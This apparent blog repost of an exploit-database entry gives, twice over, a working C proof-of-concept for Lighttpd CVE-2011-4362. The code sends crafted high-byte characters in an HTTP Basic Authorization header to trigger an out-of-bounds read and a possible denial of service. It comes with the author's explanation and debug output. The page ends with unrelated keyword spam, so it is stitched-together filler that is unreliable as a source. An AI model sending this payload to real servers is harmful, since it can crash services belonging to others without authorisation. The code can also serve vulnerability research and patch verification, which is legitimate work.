toweling cordell: [dos / poc] - Lighttpd Proof of Concept code for CVE-2011-4362

Lighttpd Proof of Concept code for CVE-2011-4362 | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

/*  * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang  *  * Here the vulnerable code (src/http_auth.c:67)  *  * --- CUT ---  * static const short base64_reverse_table[256] = {  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F  *         52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F  *         -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F  *         15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F  *         -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F  *         41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF  * };  *  * static unsigned char * base64_decode(buffer *out, const char *in) {  * 	...  * 	int ch, ...;  * 	size_t i;  * 	...  * 	  * 		ch = in[i];  * 		...  * 		ch = base64_reverse_table[ch];  * 	...  * }  * --- CUT ---  *  * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.  * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault  * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata  * section before the base64_reverse_table table cause this situation.  *  * I have added some extra debug in the lighttpd source code to see if this vulnerability is  * executed correctly. Here is output for one of the example:  *  * --- CUT ---  * ptr[0x9a92c48] size[0xc0] used[0x0]  * 127(. | 0 | 0)  * -128(t | 1 | 0)  * -127(e | 2 | 1)  * -126(' | 3 | 2)  * -125(e | 4 | 3)  * -124(u | 5 | 3)  * -123(r | 6 | 4)  * -122(' | 7 | 5)  * -121(s | 8 | 6)  * -120(c | 9 | 6)  * -119(i | 10 | 7)  * -118(n | 11 | 8)  * -117(i | 12 | 9)  * -116(  | 13 | 9)  * -115(a | 14 | 10)  * -114(t | 15 | 11)  * -113(. | 16 | 12)  * -112(e | 17 | 12)  * -111(u | 18 | 13)  * -110(r | 19 | 14)  * -109(' | 20 | 15)  * -108(f | 21 | 15)  * -107(i | 22 | 16)  * -106(e | 23 | 17)  * -105(: | 24 | 18)  * -104(= | 25 | 18)  * -103(o | 26 | 19)  * -102(t | 27 | 20)  * -101(o | 28 | 21)  * -100(  | 29 | 21)  * -99(a | 30 | 22)  * -98(g | 31 | 23)  * -97(. | 32 | 24)  * -96(d | 33 | 24)  * -95(g | 34 | 25)  * -94(s | 35 | 26)  * -93(: | 36 | 27)  * -92(u | 37 | 27)  * -91(s | 38 | 28)  * -90(p | 39 | 29)  * -89(o | 40 | 30)  * -88(t | 41 | 30)  * -87(d | 42 | 31)  * -86(b | 43 | 32)  * -85(c | 44 | 33)  * -84(e | 45 | 33)  * -83(d | 46 | 34)  * -82(( | 47 | 35)  * -81(n | 48 | 36)  * -80(y | 49 | 36)  * -79(h | 50 | 37)  * -78(d | 51 | 38)  * -77(g | 52 | 39)  * -76(s | 53 | 39)  * -75(  | 54 | 40)  * -74(r | 55 | 41)  * -73(p | 56 | 42)  * -72(a | 57 | 42)  * -71(n | 58 | 43)  * -70(. | 59 | 44)  * -69(. | 60 | 45)  * -68(d | 61 | 45)  * -67(g | 62 | 46)  * -66(s | 63 | 47)  * -65(: | 64 | 48)  * -64(( | 65 | 48)  * -63(d | 66 | 49)  * -62(- | 67 | 50)  * -61(e | 68 | 51)  * -60(s | 69 | 51)  * -59(  | 70 | 52)  * -58(i | 71 | 53)  * -57(s | 72 | 54)  * -56(n | 73 | 54)  * -55(  | 74 | 55)  * -54(i | 75 | 56)  * -53(l | 76 | 57)  * -52(. | 77 | 57)  * -51(. | 78 | 58)  * -50(k | 79 | 59)  * -49(0 | 80 | 60)  * -48(% | 81 | 60)  * -47(] | 82 | 61)  * -46(p | 83 | 62)  * -45(r | 84 | 63)  * -44(0 | 85 | 63)  * -43(% | 86 | 64)  * -42(] | 87 | 65)  * -41(s | 88 | 66)  * -40(z | 89 | 66)  * -39([ | 90 | 67)  * -38(x | 91 | 68)  * -37(x | 92 | 69)  * -36(  | 93 | 69)  * -35(s | 94 | 70)  * -34(d | 95 | 71)  * -33(0 | 96 | 72)  * -32(% | 97 | 72)  * -31(] | 98 | 73)  * -30(. | 99 | 74)  * -29(. | 100 | 75)  * -28(d | 101 | 75)  * -27(c | 102 | 76)  * -26(d | 103 | 77)  * -25(i | 104 | 78)  * -24(g | 105 | 78)  * -23(b | 106 | 79)  * -22(s | 107 | 80)  * -21(6 | 108 | 81)  * -20(- | 109 | 81)  * -19(t | 110 | 82)  * -18(i | 111 | 83)  * -17(g | 112 | 84)  * -16(f | 113 | 84)  * -15(i | 114 | 85)  * -14(e | 115 | 86)  * -13(. | 116 | 87)  * -12(. | 117 | 87)  * -11(. | 118 | 88)  * -10(. | 119 | 89)  * -9(. | 120 | 90)  * -8(. | 121 | 90)  * -7(. | 122 | 91)  * -6(. | 123 | 92)  * -5(. | 124 | 93)  * -4(. | 125 | 93)  * -3(. | 126 | 94)  * -2(. | 127 | 95)  * -1(. | 128 | 96)  * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]  * ptr[0x9a92c48] size[0xc0] used[0x60]  * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]  * --- CUT ---  *  * First column is the offset so vulnerability is executed like it should be  * (negative offsets). Second column is byte which is read out-of-bound.  *  *  * Maybe you can find vulnerable binary?  *  *  * Best regards,  * Adam 'pi3' Zabrocki  *  *  * --  * http://pi3.com.pl  * http://site.pi3.com.pl/exp/p_cve-2011-4362.c  * http://blog.pi3.com.pl/?p=277  *  */   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h>  #define PORT 80 #define SA struct sockaddr  char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic ";  char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic ";   int main(int argc, char *argv[]) {     int i=PORT,opt=0,sockfd;    char *remote_dir = NULL;    char *r_hostname = NULL;    struct sockaddr_in servaddr;    struct hostent *h = NULL;    char *buf;    unsigned int len = 0x0;      if (!argv[1])       usage(argv[0]);      printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");    printf("\n\t\t[+] Preparing arguments... ");    while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {       switch(opt) {         case 'h':           r_hostname = strdup(optarg);          if ( (h = gethostbyname(r_hostname))==NULL) {              printf("Gethostbyname() field!\n");              exit(-1);          }          break;         case 'p':               i=atoi(optarg);          break;         case 'd':               remote_dir = strdup(optarg);          break;         case '?':               usage(argv[0]);          break;         default:               usage(argv[0]);          break;        }    }     if (!remote_dir || !h) {       usage(argv[0]);       exit(-1);    }     servaddr.sin_family      = AF_INET;    servaddr.sin_port        = htons(i);    servaddr.sin_addr        = *(struct in_addr*)h->h_addr;     len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;    if ( (buf = (char *)malloc(len)) == NULL) {       printf("malloc() :(\n");       exit(-1);    }    memset(buf,0x0,len);     if (i != 80)       snprintf(buf,len,header_port,remote_dir,r_hostname,i);    else       snprintf(buf,len,header,remote_dir,r_hostname);     for (i=0;i<130;i++)       buf[strlen(buf)] = 127+i;     buf[strlen(buf)] = '\r';    buf[strlen(buf)] = '\n';    buf[strlen(buf)] = '\r';    buf[strlen(buf)] = '\n';     printf("OK\n\t\t[+] Creating socket... ");    if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {       printf("Socket() error!\n");       exit(-1);    }     printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);    if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {       printf("Connect() error!\n");       exit(-1);    }     printf("OK\n\t\t[+] Sending dirty packet... "); //   write(1,buf,strlen(buf));    write(sockfd,buf,strlen(buf));     printf("OK\n\n\t\t[+] Check the website!\n\n");     close(sockfd);  }  int usage(char *arg) {        printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");       printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg);       printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n");       exit(0); }    # 1337day.com [2011-12-31]

Lighttpd Proof of Concept code for CVE-2011-4362 | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

/*  * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang  *  * Here the vulnerable code (src/http_auth.c:67)  *  * --- CUT ---  * static const short base64_reverse_table[256] = {  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F  *         52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F  *         -1,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F  *         15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F  *         -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F  *         41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF  *         -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF  * };  *  * static unsigned char * base64_decode(buffer *out, const char *in) {  * 	...  * 	int ch, ...;  * 	size_t i;  * 	...  * 	  * 		ch = in[i];  * 		...  * 		ch = base64_reverse_table[ch];  * 	...  * }  * --- CUT ---  *  * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.  * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault  * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata  * section before the base64_reverse_table table cause this situation.  *  * I have added some extra debug in the lighttpd source code to see if this vulnerability is  * executed correctly. Here is output for one of the example:  *  * --- CUT ---  * ptr[0x9a92c48] size[0xc0] used[0x0]  * 127(. | 0 | 0)  * -128(t | 1 | 0)  * -127(e | 2 | 1)  * -126(' | 3 | 2)  * -125(e | 4 | 3)  * -124(u | 5 | 3)  * -123(r | 6 | 4)  * -122(' | 7 | 5)  * -121(s | 8 | 6)  * -120(c | 9 | 6)  * -119(i | 10 | 7)  * -118(n | 11 | 8)  * -117(i | 12 | 9)  * -116(  | 13 | 9)  * -115(a | 14 | 10)  * -114(t | 15 | 11)  * -113(. | 16 | 12)  * -112(e | 17 | 12)  * -111(u | 18 | 13)  * -110(r | 19 | 14)  * -109(' | 20 | 15)  * -108(f | 21 | 15)  * -107(i | 22 | 16)  * -106(e | 23 | 17)  * -105(: | 24 | 18)  * -104(= | 25 | 18)  * -103(o | 26 | 19)  * -102(t | 27 | 20)  * -101(o | 28 | 21)  * -100(  | 29 | 21)  * -99(a | 30 | 22)  * -98(g | 31 | 23)  * -97(. | 32 | 24)  * -96(d | 33 | 24)  * -95(g | 34 | 25)  * -94(s | 35 | 26)  * -93(: | 36 | 27)  * -92(u | 37 | 27)  * -91(s | 38 | 28)  * -90(p | 39 | 29)  * -89(o | 40 | 30)  * -88(t | 41 | 30)  * -87(d | 42 | 31)  * -86(b | 43 | 32)  * -85(c | 44 | 33)  * -84(e | 45 | 33)  * -83(d | 46 | 34)  * -82(( | 47 | 35)  * -81(n | 48 | 36)  * -80(y | 49 | 36)  * -79(h | 50 | 37)  * -78(d | 51 | 38)  * -77(g | 52 | 39)  * -76(s | 53 | 39)  * -75(  | 54 | 40)  * -74(r | 55 | 41)  * -73(p | 56 | 42)  * -72(a | 57 | 42)  * -71(n | 58 | 43)  * -70(. | 59 | 44)  * -69(. | 60 | 45)  * -68(d | 61 | 45)  * -67(g | 62 | 46)  * -66(s | 63 | 47)  * -65(: | 64 | 48)  * -64(( | 65 | 48)  * -63(d | 66 | 49)  * -62(- | 67 | 50)  * -61(e | 68 | 51)  * -60(s | 69 | 51)  * -59(  | 70 | 52)  * -58(i | 71 | 53)  * -57(s | 72 | 54)  * -56(n | 73 | 54)  * -55(  | 74 | 55)  * -54(i | 75 | 56)  * -53(l | 76 | 57)  * -52(. | 77 | 57)  * -51(. | 78 | 58)  * -50(k | 79 | 59)  * -49(0 | 80 | 60)  * -48(% | 81 | 60)  * -47(] | 82 | 61)  * -46(p | 83 | 62)  * -45(r | 84 | 63)  * -44(0 | 85 | 63)  * -43(% | 86 | 64)  * -42(] | 87 | 65)  * -41(s | 88 | 66)  * -40(z | 89 | 66)  * -39([ | 90 | 67)  * -38(x | 91 | 68)  * -37(x | 92 | 69)  * -36(  | 93 | 69)  * -35(s | 94 | 70)  * -34(d | 95 | 71)  * -33(0 | 96 | 72)  * -32(% | 97 | 72)  * -31(] | 98 | 73)  * -30(. | 99 | 74)  * -29(. | 100 | 75)  * -28(d | 101 | 75)  * -27(c | 102 | 76)  * -26(d | 103 | 77)  * -25(i | 104 | 78)  * -24(g | 105 | 78)  * -23(b | 106 | 79)  * -22(s | 107 | 80)  * -21(6 | 108 | 81)  * -20(- | 109 | 81)  * -19(t | 110 | 82)  * -18(i | 111 | 83)  * -17(g | 112 | 84)  * -16(f | 113 | 84)  * -15(i | 114 | 85)  * -14(e | 115 | 86)  * -13(. | 116 | 87)  * -12(. | 117 | 87)  * -11(. | 118 | 88)  * -10(. | 119 | 89)  * -9(. | 120 | 90)  * -8(. | 121 | 90)  * -7(. | 122 | 91)  * -6(. | 123 | 92)  * -5(. | 124 | 93)  * -4(. | 125 | 93)  * -3(. | 126 | 94)  * -2(. | 127 | 95)  * -1(. | 128 | 96)  * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]  * ptr[0x9a92c48] size[0xc0] used[0x60]  * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]  * --- CUT ---  *  * First column is the offset so vulnerability is executed like it should be  * (negative offsets). Second column is byte which is read out-of-bound.  *  *  * Maybe you can find vulnerable binary?  *  *  * Best regards,  * Adam 'pi3' Zabrocki  *  *  * --  * http://pi3.com.pl  * http://site.pi3.com.pl/exp/p_cve-2011-4362.c  * http://blog.pi3.com.pl/?p=277  *  */   #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h>  #define PORT 80 #define SA struct sockaddr  char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic ";  char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic ";   int main(int argc, char *argv[]) {     int i=PORT,opt=0,sockfd;    char *remote_dir = NULL;    char *r_hostname = NULL;    struct sockaddr_in servaddr;    struct hostent *h = NULL;    char *buf;    unsigned int len = 0x0;      if (!argv[1])       usage(argv[0]);      printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");    printf("\n\t\t[+] Preparing arguments... ");    while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {       switch(opt) {         case 'h':           r_hostname = strdup(optarg);          if ( (h = gethostbyname(r_hostname))==NULL) {              printf("Gethostbyname() field!\n");              exit(-1);          }          break;         case 'p':               i=atoi(optarg);          break;         case 'd':               remote_dir = strdup(optarg);          break;         case '?':               usage(argv[0]);          break;         default:               usage(argv[0]);          break;        }    }     if (!remote_dir || !h) {       usage(argv[0]);       exit(-1);    }     servaddr.sin_family      = AF_INET;    servaddr.sin_port        = htons(i);    servaddr.sin_addr        = *(struct in_addr*)h->h_addr;     len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;    if ( (buf = (char *)malloc(len)) == NULL) {       printf("malloc() :(\n");       exit(-1);    }    memset(buf,0x0,len);     if (i != 80)       snprintf(buf,len,header_port,remote_dir,r_hostname,i);    else       snprintf(buf,len,header,remote_dir,r_hostname);     for (i=0;i<130;i++)       buf[strlen(buf)] = 127+i;     buf[strlen(buf)] = '\r';    buf[strlen(buf)] = '\n';    buf[strlen(buf)] = '\r';    buf[strlen(buf)] = '\n';     printf("OK\n\t\t[+] Creating socket... ");    if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {       printf("Socket() error!\n");       exit(-1);    }     printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);    if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {       printf("Connect() error!\n");       exit(-1);    }     printf("OK\n\t\t[+] Sending dirty packet... "); //   write(1,buf,strlen(buf));    write(sockfd,buf,strlen(buf));     printf("OK\n\n\t\t[+] Check the website!\n\n");     close(sockfd);  }  int usage(char *arg) {        printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");       printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg);       printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n");       exit(0); }    # 1337day.com [2011-12-31]

Source: http://www.1337day.com/exploits/17319

nook tablet eagles magic johnson involuntary manslaughter stevens johnson syndrome verdict in michael jackson trial verdict in michael jackson trial

toweling cordell

Tuesday, January 3, 2012

[dos / poc] - Lighttpd Proof of Concept code for CVE-2011-4362

No comments:

Post a Comment